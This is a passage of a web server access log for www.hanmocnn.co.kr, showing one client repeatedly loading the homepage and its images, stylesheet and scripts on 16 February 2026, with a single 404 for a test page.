Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9745] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:26:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:27:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test.html" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:27:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/test.html" -[16/Feb/2026:04:27:27 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9751] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9751] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:39:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9751] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:40:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9762] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9847] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:46:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9851] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9847] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17647] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:47:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9851] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:48:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 